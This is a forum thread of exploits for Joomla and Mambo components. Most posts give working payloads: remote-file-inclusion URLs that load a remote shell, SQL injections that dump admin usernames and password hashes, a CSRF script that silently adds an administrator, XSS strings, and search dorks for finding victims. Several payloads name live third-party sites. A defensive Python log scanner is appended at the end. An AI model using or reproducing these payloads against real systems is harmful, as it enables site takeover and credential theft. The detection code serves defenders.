Overview of vulnerabilities in CMS [Joomla, Mambo] and their components

Discussion in 'Web vulnerabilities' started by it's my, 6 Oct 2007.

  1. Proxyr

    com_serverstat (Mambo & Joomla component)
    /This component is used to display game server statistics/

    The vulnerability allows a remote user to execute an arbitrary PHP script on the target system. It exists because of insufficient handling of input in the "mosConfig_absolute_path" parameter in the template script administrator/components/com_serverstat/templates/template.game.php. A remote user can execute an arbitrary PHP script on the target system with the privileges of the web server. The variable passed via the GET request is used in an include. For successful exploitation, the "register_globals" option must be enabled in the PHP configuration file.
    Example:
    Code:
    http://[host]/administrator/components/com_serverstat/templates/template.game.php?mosConfig_absolute_path=[http://file]
    ...........................................
    and also:
    in the "mosConfig_absolute_path" parameter in the script administrator/components/com_serverstat/install.serverstat.php
    Example:
    Code:
    http://[host]/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=[http://file]
     
    #21 Proxyr, 11 Jan 2008
    Last edited: 11 Jan 2008
    1 person likes this.
  2. _kREveDKo_

    com_serverstat (Mambo & Joomla component)
    Well then, let's also mention that there is an active XSS there too, in the player nickname field. If there aren't enough characters for a full attack (I don't remember how many fit in a nickname), you can end the nickname like this:
    HTML:
    <!--
    , then join the game as another player with a nickname starting with
    HTML:
    -->
    and so on, until there is enough room...
     
    2 people like this.
  3. +toxa+

    Joomla 1.0.13 CSRF Vulnerability

    PHP:
    <script type="text/javascript">
    window.onload = function() {
        var url = "http://joomlasite.com/joomla/administrator/index2.php";
        var gid = 25;
        var user = 'custom_username';
        var pass = 'custom_password';
        var email = 'joe_cool (at) example (dot) com [email concealed]';
        var param = {
            name: user,
            username: user,
            email: email,
            password: pass,
            password2: pass,
            gid: gid,
            block: 0,
            option: 'com_users',
            task: 'save',
            sendEmail: 1
        };
        var form = document.createElement('form');
        form.action = url;
        form.method = 'post';
        form.target = 'hidden';
        form.style.display = 'none';
        for (var i in param) {
            try {
                // ie
                var input = document.createElement('<input name="'+i+'">');
            } catch(e) {
                // other browsers
                var input = document.createElement('input');
                input.name = i;
            }
            input.setAttribute('value', param[i]);
            form.appendChild(input);
        }
        document.body.appendChild(form);
        form.submit();
    }
    </script>
    <iframe name="hidden" style="display: none"></iframe>
    <img src="http://www.more4kids.info/uploads/Image/Carebears-Cover.jpg">
    PS: adds a new admin with the given login, password and email, in case anyone didn't get it...
     
  4. iddqd

    JoomlaFlash Component Multiple Remote File Inclusion

    Flash Component Multiple Remote File Inclusion

    Vulnerable: 2.5.1, 2.5.2

    Exploit:

    Code:
    http://sito.it/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=shell?
    http://sito.it/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=shell?
    
     
  5. ХаЬа

    Joomla Component NeoRecruit

    SQL:
    http://[site]/index.php?option=com_neorecruit&task=offer_view&id=[SQL injection]

    Example:
    Code:
    http://www.sepangaircraft.com/index.php?option=com_neorecruit&task=offer_view&id=369852+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+FROM+jos_users--
    Joomla Component Nice Talk

    SQL:
    http://[site]/index.php?option=com_nicetalk&tagid=[SQL injection]

    Example:
    Code:
    http://www.diariometropolitano.com/rmbs/index.php?option=com_nicetalk&tagid=-1)+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15,16,17,18+FROM+jos_users--

    Joomla prefix: jos_
    Mambo prefix: mos_
     
  6. iddqd

    Joomla Multiple Remote File Inclusion

    Remote File Inclusion

    Vulnerable: com_panoramic version 1.0

    PoC:

    Code:
    http://localhost/path/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=[evilcode]
    
    Remote File Inclusion

    Vulnerable: MOSMediaLite451

    PoC:

    Code:
    http://www.site.net/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=[shell] 
    http://www.site.net/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=[shell] 
    http://www.site.net/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=[shell] 
    http://www.site.net/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=[shell] 
    http://www.site.net/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=[shell] 
    http://www.site.net/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=[shell]
    
     
    #26 iddqd, 24 Jan 2008
    Last edited: 24 Jan 2008
  7. Solide Snake

    Mambo Component Newsletter (listid) Remote SQL Injection

    SQL Injection:

    Code:
    index.php?option=com_newsletter&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
    To search, enter:

    Code:
    allinurl: "com_newsletter"

    Mambo Component Fq (listid) Remote SQL Injection

    SQL Injection:

    Code:
    index.php?option=com_fq&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
    To search, enter:

    Code:
    allinurl: "com_fq"

    Mambo Component MaMML (listid) Remote SQL Injection

    SQL Injection:

    Code:
    index.php?option=com_mamml&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
    To search, enter:

    Code:
    allinurl: "com_mamml"

    Mambo Component Glossary 2.0 (catid) SQL Injection

    SQL Injection:

    Code:
    index.php?option=com_glossary&func=display&Itemid=s@bun&catid=-1%20union%20select%201,username,password,4,5,6,7,8,9,10,11,12,13,14%20from%20mos_users-
    To search, enter:

    Code:
    allinurl: "com_glossary"
    (c)
     
    1 person likes this.
  8. Solide Snake

    Mambo Component musepoes (aid) Remote SQL Injection

    SQL Injection:

    Code:
    index.php?option=com_musepoes&task=answer&Itemid=s@bun&catid=s@bun&aid=-1/**/union/**/select/**/0,username,password,0x3a,0x3a,3,0,0x3a,0,4,4,4,0,0x3a,0,5,5,5,0,0x3a/**/from/**/mos_users/*
    To search, enter:

    Code:
    allinurl: "com_musepoes"

    Mambo Component buslicense (aid) Remote SQL Injection

    SQL Injection:

    Code:
    index.php?option=com_buslicense&sectionid=9999&Itemid=9999&task=list&aid=-1/**/union/**/select/**/0,username,0x3a,password,4,5,6,7,8,9,10,11,12,13,14/**/from/**/mos_users/*
    To search, enter:

    Code:
    allinurl: "com_buslicense"

    Mambo Component Recipes 1.00 (id) Remote SQL Injection

    SQL Injection:

    Code:
    index.php?option=com_recipes&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,1,concat(username,0x3a,password),username,0x3a,5,6,7,8,9,10,11,12,0x3a,0x3a,0x3a,username,username,0x3a,0x3a,0x3a,21,0x3a/**/from/**/mos_users/*
    To search, enter:

    Code:
    allinurl: "com_recipes"

    Mambo Component jokes 1.0 (cat) SQL Injection

    SQL Injection:

    Code:
    index.php?option=com_jokes&Itemid=S@BUN&func=CatView&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*
    To search, enter:

    Code:
    allinurl: "com_jokes"

    Mambo Component EstateAgent 0.1 Remote SQL Injection

    SQL Injection:

    Code:
    index.php?option=com_estateagent&Itemid=S@BUN&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=S@BUN
    To search, enter:

    Code:
    allinurl: "com_estateagent"
    (c)
     
    2 people like this.
  9. it's my

    Component Catalogshop 1.0b1 SQL Injection Vulnerability

    inurl: index.php?option=com_catalogshop
    Injection:
    Code:
    index.php?option=com_catalogshop&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+mos_users--
    http://www.uralmetall.com/index.php?option=com_catalogshop&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+mos_users--
    Component AkoGallery 2.5b SQL Injection Vulnerability

    inurl: index.php?option=com_akogallery
    Injection:
    Code:
    index.php?option=com_akogallery&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mos_users--
    http://brodnica.com.pl/powiat/index.php?option=com_akogallery&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mos_users--
    (c) hackturkiye.com
     
    1 person likes this.
  10. Mr. P.S.

    SQL injection in Mambo Component Restaurant

    Software: Mambo Component Restaurant 1.0

    The vulnerability allows a remote user to execute arbitrary SQL commands in the application's database. It exists because of insufficient handling of input in the "id" parameter by the index.php script. A remote user can execute arbitrary SQL commands in the application's database by means of a specially crafted request.

    Example:
    Code:
    index.php?option=com_restaurant&Itemid=S@BUN&func=detail&id=-1/* */union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/* */from/**/mos_users/*
    (c)
     
    #30 Mr. P.S., 1 Feb 2008
    Last edited: 1 Feb 2008
    3 people like this.
  11. chekist

    SQL injection in Gary's Cookbook 2.3.4; I didn't look at other versions

    google: inurl:option inurl:com_garyscookbook (251,000 in total)

    POST http://localhost/joomla/index.php HTTP/1.0
    Accept: */*
    Referer: http://localhost/joomla/index.php?option=com_garyscookbook&Itemid=&func=detail&id=1
    Accept-Language: en-us
    Content-Type: application/x-www-form-urlencoded
    Proxy-Connection: Keep-Alive
    User-Agent: Opera 9.95
    Host: localhost
    Content-Length: 95
    Pragma: no-cache

    option=com_garyscookbook&Itemid=&func=vote&imgvote=4&id=1,(select username from %23__users where gid=25 or gid=24 limit 1))%23


    query to the DB:
    INSERT INTO jos_gkb_voting_log (type,date,userid,fileid,ipaddress) VALUES ('3','2008-00-00 00:00:00', 0,[sql],'127.0.0.1');

    the query results are not displayed anywhere
    the only way to exploit it is character-by-character brute force
    p.s. it's too much of a pain, so I didn't dig any further; if anyone manages to add an insert or update, please post
     
    1 person likes this.
  12. it's my

    Component NeoReferences 1.3.1 (catid) SQL Injection Vulnerability

    inurl: index.php?option=com_neoreferences
    Injection:
    Code:
    index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
    http://www.islamicamagazine.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
    Mambo Component Mambads 1.5 Remote SQL Injection
    inurl: index.php?option=com_mambads
    Injection:
    Code:
    index.php?option=com_mambads&Itemid=0&func=detail&cacat=0&casb=0&caid=100500+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(username,0x3a,password),null,null,null,null,null,null,null+from+mos_users--
    http://www.vivalavida.org/index.php?option=com_mambads&Itemid=0&func=detail&cacat=0&casb=0&caid=100500+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(username,0x3a,password),null,null,null,null,null,null,null+from+mos_users--
    (c) hackturkiye.com
     
    #32 it's my, 1 Feb 2008
    Last edited: 8 Feb 2008
    2 people like this.
  13. iddqd

    Mambo Component SOBI2 RC 2.5.3 SQL Injection Vulnerability

    PoC:

    Code:
    http://site.com/path/index.php?option=com_sobi2&Itemid=27&catid=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*
    
     
  14. chekist

    Mosets Hot Property v0.9.6

    magic_quotes_gpc off
    register_globals on

    HTML:
    http://localhost/joomla/components/com_hotproperty/pdf.php?id=10'+and+1=0+union+select+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,concat(username,0x3a,password),1+from+%23__users+where+gid=25+or+gid=24+limit+1/*
     
    #34 chekist, 3 Feb 2008
    Last edited: 6 Dec 2008
  15. KPOT_f!nd

    Joomla Component mosDirectory 2.3.2 (catid) Remote SQL Injection Vulnerability


    Code:
    /index.php?option=com_directory&page=viewcat&catid=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*
    Search for the vulnerable component: inurl:index.php?option=com_directory
    Author: aNa TrYaGi
    Source: milw0rm.com [2008-02-03]
     
  16. Mr. P.S.

    Joomla Component Markplace 1.1.1 Remote Sql Injection Exploit

    Author: SoSo H H (Iraqi-Cracker)
    Tested on: Markplace Version 1.1.1 and 1.1.1-pl1
    Search for the vulnerable component:
    "Marketplace Version 1.1.1"
    "Marketplace Version 1.1.1-pl1"
    inurl:index.php?option=com_marketplace
    Exploit:
    Code:
    index.php?option=com_marketplace&page=show_category&catid=(SQL)
    Example:
    Code:
    (SQL)=-1+union+select+concat(username,0x3a,password),2,3+from+jos_users/*
    milw0rm.com [2008-02-03]



    ----------------------------------------------------
    HOME : http://www.hackturkiye.com/
    AUTHOR : S@BUN :
    joomla SQL Injection(com_awesom)

    DORKS 1: allinurl :"com_awesom"
    EXPLOIT:
    Code:
    index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null,null,null,null/**/from/**/mos_users/*
    Code:
    <name>Awesom</name>
    <creationDate>24/05/2004</creationDate>
    <author>Madd0</author>
    <copyright>This component is released under the GNU/GPL License</copyright>
    <authorEmail>[email protected]</authorEmail>
    
    <authorUrl>amazoop.sourceforge.net</authorUrl>
    <version>0.3.2</version>
    <description>Awesom!, or Amazon Web Services for Opensource Mambo, is a component that lets you create lists of products to feature on your Mambo-driven site.<br />
    These lists can be customized or can be automatically generated with information provided by Amazon through Amazon Web Services.<br />
    Additionally, if you are an Amazon associate, you can configure Awesom to link to Amazon 
    using your associate ID in order to earn comissions.
    </description>
    milw0rm

    joomla SQL Injection(com_shambo2)

    DORKS 1: allinurl :"com_shambo2"
    EXPLOIT:
    Code:
    index.php?option=com_shambo2&Itemid=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2Cconcat(username,0x3a,password)%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users
    milw0rm

    joomla SQL Injection(com_downloads)(filecatid)

    DORKS 1: allinurl :"com_downloads"filecatid
    EXPLOIT:
    Code:
    index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
    milw0rm

    Joomla Component Ynews 1.0.0

    The vulnerability allows a remote user to execute arbitrary SQL commands in the application's database. It exists because of insufficient handling of input in the "id" parameter by the index.php script. A remote user can execute arbitrary SQL commands in the application's database by means of a specially crafted request.

    Example:
    Code:
    /index.php?option=com_ynews&Itemid=0&task=showYNews&id=-1/* */union/**/select/**/0,1,2,username,password,5,6%20from%20jos_users/*
    xakep.ru
     
    #36 Mr. P.S., 4 Feb 2008
    Last edited: 7 Feb 2008
  17. it's my

    Component Ynews 1.0.0 SQL Injection Vulnerability

    inurl: index.php?option=com_ynews
    Injection:
    Code:
    index.php?option=com_ynews&Itemid=0&task=showYNews&id=-1+union+select+0,1,2,concat(username,0x3a,password),null,5,6+from+jos_users/*
    http://www.newpowersoul.de/index.php?option=com_ynews&Itemid=0&task=showYNews&id=-1+union+select+0,1,2,concat(username,0x3a,password),null,5,6+from+jos_users/*
    (c) milw0rm.com
     
    1 person likes this.
  18. it's my

    Component PeopleBook 1.1.6 Passive XSS

    inurl: index.php?option=com_peoplebook
    Injection:
    Code:
    /index.php?option=com_peoplebook&Itemid=661&func=searchstaff&Itemid=661&field=name&term=%22%3E%3Cscript%3Ealert(document.coockie)%3C/script%3E&submit=Go&search_status=%25&search_category=%25
    http://www.fln.org/index.php?option=com_peoplebook&Itemid=661&func=searchstaff&Itemid=661&field=name&term=%22%3E%3Cscript%3Ealert(document.coockie)%3C/script%3E&submit=Go&search_status=%25&search_category=%25
    note: the XSS works only if search is enabled in the component.

    (c) it's my


    Added 08.02.2008
    ----------------------
    I don't know what this one is, but it is definitely an active XSS
    Code:
    http://www.pan-group.com/mambo4.6/index.php?option=com_guest&option=com_guest&task=show&pageid=1
    Also a passive XSS in the Quote component:
    Code:
    http://www.hlconveyancing.com/index.php?option=com_quote&task=instructUs&Itemid=49
    in all fields enter "><script>alert(document.coockie)</script>
    Component com_noticias 1.0 SQL Injection

    inurl: index.php?option=com_noticias
    Injection:
    Code:
    index.php?option=com_noticias&Itemid=999999&task=detalhe&id=-1+union+select+0,null,concat(username,0x3a,password),3,4,5+from+jos_users/*
    http://www.cm-stirso.pt/index.php?option=com_noticias&Itemid=999999&task=detalhe&id=-1+union+select+0,null,concat(username,0x3a,password),3,4,5+from+jos_users/*
    (c) zone-turk.net
     
    #38 it's my, 7 Feb 2008
    Last edited: 8 Feb 2008
  19. FraiDex

    SQL Injection

    Mambo Component com_gallery Remote SQL Injection Vulnerability


    Code:
    EXPLOIT 1 :
    
    index.php?option=com_gallery&Itemid=0&func=detail&id=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*
    
    
    EXPLOİT 2 :
    
    index.php?option=com_gallery&Itemid=0&func=detail&id=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2Cpassword%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users
    

    SQL Injection

    Joomla Component NeoGallery 1.1 SQL Injection Vulnerability

    Code:
    EXPLOIT :
    
    index.php?option=com_neogallery&task=show&Itemid=5&catid=999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from%2F%2A%2A%2Fjos_users
    milw0rm.com
     
  20. CaNNabi$

    Mambo SQL Injection (com_comments)

    Code:
    index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSWORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+from+mos_content_comments+where+1=1
    http://www.milw0rm.com
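
A defender's view of the request patterns posted throughout this thread, as an added example (not code from any poster): a Python access-log scanner that flags `mosConfig_*` parameters supplied in the query string and UNION SELECT payloads aimed at the `jos_users`, `mos_users` or `#__users` tables. The log lines, addresses, finding labels and the `com_example` component are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_COMMENT_RE = re.compile(r"/\*.*?\*/")  # /**/ and /* */ standing in for spaces
UNION_SELECT_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b")
USERS_TABLE_RE = re.compile(r"(?:\b(?:jos|mos)_|#__)users\b")
REMOTE_URL_RE = re.compile(r"^(?:https?|ftp)://", re.I)

# Constructed sample lines: documentation addresses, hypothetical com_example.
_PREFIX = '203.0.113.9 - - [01/Feb/2008:10:00:00 +0000] "GET '
_SUFFIX = ' HTTP/1.1" 200 2048'
SAMPLE_LOG = [_PREFIX + target + _SUFFIX for target in (
    "/index.php?option=com_content&task=view&id=12",
    "/administrator/components/com_example/tpl.php"
    "?mosConfig_absolute_path=http://files.example/x.txt?",
    "/index.php?option=com_example&id=-1/**/union/**/select/**/"
    "username,password/**/from/**/mos_users/*",
    "/index.php?option=com_example&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2F"
    "select%2F%2A%2A%2F0%2Cpassword%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users",
    "/index.php?option=com_example&id=1'+and+1=0+UNION+SELECT+1,"
    "password+from+%23__users+limit+1/*",
    "/index.php?option=com_search&searchword=student+union+select+committee",
)]


def normalise_sql(value):
    """Undo obfuscation used in the posted payloads: comments as spaces, mixed case."""
    return re.sub(r"\s+", " ", SQL_COMMENT_RE.sub(" ", value)).lower()


def classify(log_line):
    """Return the set of findings for one access-log line."""
    findings = set()
    match = REQUEST_RE.search(log_line)
    if not match:
        return findings
    query = urlsplit(match.group(1)).query
    # parse_qsl percent-decodes values and turns '+' into spaces.
    for name, value in parse_qsl(query, keep_blank_values=True):
        # mosConfig_* are server-side settings; a request has no reason to supply them.
        if name.lower().startswith("mosconfig_"):
            findings.add("config-override")
            if REMOTE_URL_RE.match(value):
                findings.add("remote-include")
        sql = normalise_sql(value)
        # Requiring a users-table reference keeps ordinary text such as
        # "student union select committee" from being flagged.
        if UNION_SELECT_RE.search(sql) and USERS_TABLE_RE.search(sql):
            findings.add("sqli-users-table")
    return findings


def scan(lines):
    """Return (1-based line number, sorted findings) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        findings = classify(line)
        if findings:
            hits.append((number, sorted(findings)))
    return hits


if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, ", ".join(findings))
```

The POST-body injection described for Gary's Cookbook does not appear in a standard access log; catching it needs request-body logging or inspection at a proxy or WAF.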